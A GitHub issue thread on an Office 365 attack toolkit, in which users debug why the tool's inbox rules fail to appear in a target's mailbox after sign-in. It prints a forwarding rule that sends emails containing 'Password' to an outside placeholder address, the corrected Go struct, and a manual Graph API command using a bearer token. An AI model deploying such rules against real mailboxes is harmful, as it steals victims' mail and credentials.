### ISSUE TITLE
Email Rules not working

### ISSUE THREAD

**Issue by g4inz** [mdsecactivebreach/o365-attack-toolkit#8] opened 2019-10-11 17:00 UTC
Firstly, hats off to you for creating an amazing tool! 

I've got the main functionality of the tool working... importing emails based on keywords to the mgmt interface (8080) - (The sign-in is a 'one-off' import of the target's emails which is as designed).

However, email rules are not created in the target's inbox. I've created a test rule (similar to the example rule) which is essentially just changing the return email address - Neither of these are created. 

I have more or less achieved what I needed to with this tool (ie getting it to retrieve emails) but for completeness just want to ensure I've understood the email rules functionality correctly. Is there an additional option which is required to be enabled? Or should this create the rules automatically once the target 'signs-in'? If so, can you confirm if this working correctly?

Thanks

**Comment by 0x09AL** [comment] 2019-10-11 18:31
Hi,
I really appreciate the feedback. 
Yes you have understood it correctly. For every rule defined in the rules folder, when a user is signed in, it will automatically create all of them.

If possible, can you provide the rule so I can confirm if it's a bug on the software or the rule is invalid.

Thanks

**Comment by mhomden** [comment] 2020-02-24 17:01
Hi - Great tool!
Looks like I have the same issue and the forwarding rule is not being created, would be great to get this working. Also is there any way to delete info out of the DB, I'd like to be able to delete a user and the associated emails.

**Comment by Techbrunch** [comment] 2020-04-23 19:32
@0x09AL Thanks for the tool !

I looked into it and found the issue.

This is what the example rule looks like:

```json
{
  "displayName": "Example Rule",
  "sequence": 2,
  "isEnabled": true,
  "conditions": {
    "bodyContains": [
      "Password"
    ]
  },
  "actions": {
    "forwardTo": [
      {
        "emailAddress": {
          "name": "Email test",
          "address": "emailtest@nonexistenddomain.com"
        }
      }
    ],
    "stopProcessingRules": true
  }
}
```

The rule struct does not have `bodyContains` and expect a `SenderContains`:

```go
type Rule struct {
	DisplayName string `json:"displayName"`
	Sequence    int    `json:"sequence"`
	IsEnabled   bool   `json:"isEnabled"`
	Conditions  struct {
		SenderContains []string `json:"senderContains"`
	} `json:"conditions"`
	Actions struct {
		ForwardTo []struct {
			EmailAddress struct {
				Name    string `json:"name"`
				Address string `json:"address"`
			} `json:"emailAddress"`
		} `json:"forwardTo"`
		StopProcessingRules bool `json:"stopProcessingRules"`
	} `json:"actions"`
}
```

Which lead to the following payload being sent:

```json
{
    "actions": {
        "forwardTo": [
            {
                "emailAddress": {
                    "address": "emailtest@nonexistenddomain.com",
                    "name": "Email test"
                }
            }
        ],
        "stopProcessingRules": true
    },
    "conditions": {
        "senderContains": null
    },
    "displayName": "Example Rule",
    "isEnabled": true,
    "sequence": 2
}
```

Which leads to the server returning an error (not logged):

```json
{
  "error": {
    "code": "RequestBodyRead",
    "message": "A null value was found for the property named 'SenderContains', which has the expected type 'Collection(Edm.String)[Nullable=False]'. The expected type 'Collection(Edm.String)[Nullable=False]' does not allow null values.",
    "innerError": {
      "request-id": "154fd272-186e-45ac-878b-e674a3052498",
      "date": "2020-04-23T19:09:22"
    }
  }
}
```

I did it manually as a workaround:

```
http post https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules Authorization:" Bearer eyJ..." < rules/exampleRule.json
```

**Comment by 0x09AL** [comment] 2020-04-24 09:32
Hi @Techbrunch,
You are correct nice catch. It was an error when converting the JSON to the structure, will try and push out an updated version.

Thanks a lot for the good issue description.

**Comment by mhomden** [comment] 2020-04-24 15:08
@0x09AL  - Can confirm once the rule struct is changed rules are created as expected.

**Comment by 0x09AL** [comment] 2020-11-06 10:35
E-mail rules have been discontinued on the new version, closing this issue.

**Closed as completed by 0x09AL** 2020-11-06 10:35 UTC
